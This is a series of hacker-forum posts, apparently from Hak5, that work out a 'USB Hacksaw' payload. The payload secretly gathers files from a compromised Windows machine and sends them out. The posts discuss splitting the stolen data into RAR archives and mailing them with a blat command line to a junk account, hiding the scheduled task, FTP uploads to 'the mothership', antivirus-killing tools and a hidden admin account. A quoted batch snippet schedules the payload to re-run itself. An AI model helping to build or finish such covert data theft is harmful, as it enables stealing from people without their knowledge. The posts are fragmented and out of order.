Darren Kitchen

Mmm... Now I really want a great big bowl of hax0rflakes. *looks to his left* Well, what do ya know! *eats hax0rflakes right out of the box*

I'll try it this afternoon. I was able to get this hack, the USB Hacksaw, working on a guest account so thats pretty exciting stuff. Unfortunately the IFMEMBER command doesnt work so I've got a lot of redundancy in my script which could be cleaned up if I knew if the logged in user was guest or power user/admin. then again maybe creating a directory in %systemroot% and checking the errorlevel would help determine that since guests cant do that. ahh, POC code.... you know how it goes. just enough to make it work.

burn my land, boil my sea, you cant take the sky from me

Hak5 does not encourage or condone illegal activities. As for what I did on my school network? I'll plead the Hak5th.

It doesnt get any easier than this: http://www.antsight.com/zsl/rainbowcrack/d...wcrack_cfg5.txt Follow by example. Good luck with your hacking.

Very sweet. Makes switchblade more powerful. Edit: http://www.hak5.org/wiki/AV_Killer

http://www.hak5.org/wiki/Episode_2x02#Over...emory_Trade-Off

finished the hack. thanks for all the help guys!

Not quite working S:>cscript send.vbs goodies* Microsoft (R) Windows Script Host Version 5.6 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. S:send.vbs(19, 30) Microsoft VBScript compilation error: Syntax error for me 19,30 is where it does the -to emailaddress Seems that "to" is a vbs command its its parsing it wrong. what's the escape character for vbs?

there is no rule against pimping your podcast here.

ok i've got everything working now except for one last thing. (i say that now but once the proof of concept is done you know feature creep will set in). anyway, here's the problem and I'm sure it's something that could be done with a simple loop in batch. i'd R the FM but im crashing hard after not sleeping for a few days so i'll be lazy and ask. here's the deal: the hack is done. the goodies have been retreived. then rar'd for size. to keep things simple we're using email with ssl which means attachment size needs to be low. if the goodies are less than 5 MB it's no issue, a single rar file will do the trick. but if we've got say, three 5 mb rar files to email we'll need a loop. Here's what we've got: goodies.r00 goodies.r01 goodies.r02 and we need to do this to each file: blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know. Oh, and thanks for everyones input and help on this project. i wont forget your names when doing the segment this weekend.

got it working so that once the right paramaters are met the data retrieval will begin and invisibly run the batch file. that's part 1. ive got the tools and commands to send email attachments via command line. that's part 3. now part 2 is rar'ing the files for delivery. shouldnt be long now.

ok so blat doesnt work with gmail smtp out of the box. it doesnt handle ssl correctly. supposedly stunnel can be used to wrap it correctly. im looking for some info on that now. also turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx *however*, it requires dot net framework 2.0, and it adds an icon to the systray. bummer! could have been perfect.

So it turns out that gmail has its own smtp server. oops. forgot about that. im pretty sure blat will work with its auth requirements too. *scha-wing* testing...

Blat really looks like the best option for this hack. We just need a lightweight, command line, local SMTP relay. http://sapes.sourceforge.net/docs/configur...html#config.txt and http://emailrelay.sourceforge.net/ look ok at first glance. I'm digging deeper right now. If we can get email to send without the use of the 3rd party SMTP server that will fix one of the problems. I do believe I saw a program a while ago that will allow you to register a BAT as a service. If that's the case all we need is a batch file that runs a loop to process a few commands every 6 hours or so. Actually, know what? As I type this I think there may be a better way to initiate all of this, but it would require just a tiny itty bit of C code. I've got the source of the utility that I'm basing this hack off of. It runs resident and performs a data gathering action when certain paramaters are met. Since it's already resident in memory and initiates the hack when it's needed the best solution would be to at least run the batch once it's done with the data stealing. I havent touched C since a programming class 4 years ago, but I've been keeping up with PHP which in a very loose way is similar so maybe I'll try a dirty hack and just add a system() command to initiate the batch. Then I just need to find a half decent C compiler for windows and make this bad boy. Assuming that all works the only thing left is to transmit the data, and I think between RAR to split the files, a local SMTP mail transfer agent, and blat, this is totally doable. I know I'm being a bit vague. I apologize. If you've got C experience and want to help with this I can give you all the details on IRC, PM, skype conf, etc. I'll be up all night working on this so if you're up for some fun let me know.

Ok, consider it's 32 MB. How does that change things? Also, transfer of this data does not need to be secure. I really like pseudobreed's idea of splitting the data in RAR files and sending out to a junk gmail/yahoo mail/etc account using blat, however three problems come to mind. 1. Blat is an awesome tool for sending attachments through SMTP via command line, but as far as I know blat does not have it's own SMTP server, thus requiring an open SMTP server, or SMTP server from the ISP. Not going to work. 2. AT command schedules tasks really nicely, but the command will show up in the Scheduled Tasks folder in control panel. Sure it's not a biggie but it'd be better if it wasn't that visible. An invisible (to the average user) application that runs on startup might do the trick. 3. "Batch it all up." Now you're speaking my language. Quick and dirty, easy to modify, but one little problem. Not so much with the stealthy. Though I must say I haven't tried using the .vbe from the switchblade to run the command without a visable console. that might solve the problem. Anyway for what I'm trying to do this is the closest thing to a solution I've seen yet. I'm on all night working on this hack so if you want to get a hold of me I'm on irc.hak5.org #hak5 and skype: username Hak5Darren.

There are several ways to use the admin user account created by the USB switchblade. Start by getting familiar with this: http://www.ss64.com/nt/net_use.html Then get creative with this: http://www.microsoft.com/windowsxp/downloa...rdclientdl.mspx

Sorry for double post. Just downloaded pseudobreed's payload to analyze. Came in at 8 KB/s. Here are hak5.org mirrors http://www.hak5.org/releases/2x02/switchbl...uzer_Loader.zip PS: This is a really elegant payload. It should be added to the wiki. Edit: Scratch that, I cant seem to download the Payload zip. The download quits after a minute and I only get 10%. Could you mirror somewhere?

pseudobreed, I follow your payload so far except this threw me for a loop. :: Schedule Update :: Parse Time for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do ( set hh=%%a set mn=%%b set ss=%%c set ds=%%d ) :: Add 5 Minutes set /a mn=mn+5 :: If Min is less than 10, add 0 to front if %mn% LSS 10 set mn=0%mn% :: Sched Next Update at %hh%:%mn% %windir%system32sched.bat :: Done Can you explain this part of your batch in more detail? I'm currently working on a hack for the next episode that I'm almost done with, except for a little issue with retreiving "goodies" that the program gathers. It needs to run at a set interval and upload said goodies to a remote location without the user noticing. I'd rather not use the windows task scheduler and any way to supress a command window would be best. If you could clear that up for me or offer any suggestions on my problem that would be a great help. The hack I'm working on has some really big potential if I can just get the data off the owned machine automatically and without notice.

maybe I should clarify a bit. We're talking about potential tens to hundreds of megabytes, though likely only tens at a time. I agree that a public drop point is better than a specific drop point for anonymity sake. So, would anyone happen to know of some code that already does something like this? I'm so close to having this thing complete and it's a really sweet hack but without the *have owned box send goodies somewhere* part it's not as sweet. I know with some time we could probably code up something that splits up the data into chunks and uses stenography to upload the data to flickr, but I dont have the tools or time. Grr. Stupid deadline.

You forgot something moonlit...

Say, hypothetically, that we've owned a box. Box of course being a Windows 2000, XP, or 2003 computer. And that box is now doing some data recovery for us. And you no longer have access to the box either over the web or physically, but you want it to transmit the data that it's been gathering to you somehow. It needs to do this periodically and invisibly. That means that a schedule task set to run a batch script which initiates an FTP connection to "the mothership" in order to upload said goodies isn't the best solution. How would you go about it? Remember, this box is owned and whatever owned it can install whatever is necessary to make this happen. My thinking is a simply program that runs resident and FTP, SFTP, whatever's the goodies back home on a set interval without showing up in the usual places. Invisability to the user is a must. Thoughts? Oh, and incase you're wondering, yes this is the second half of a problem I'm having with a proof of concept hack for the next episode so the sooner I figure out how to get the goodies back home, the better. Mad props for any working solution. ;)

atleast not your personally identifiable information :P I like that ;)....

I saw the subject line and was about to pop in and say truecrypt. Then I ready the body and realized that it's not an option for you. I too would be interested if anyone else has a solution for encryption on Windows without admin access.

1. Dont keep personally identifiable information on a switchblade 2. Dont keep personally identifiable information on a switchblade 3. Dont keep personally identifiable information on a switchblade 4. See #1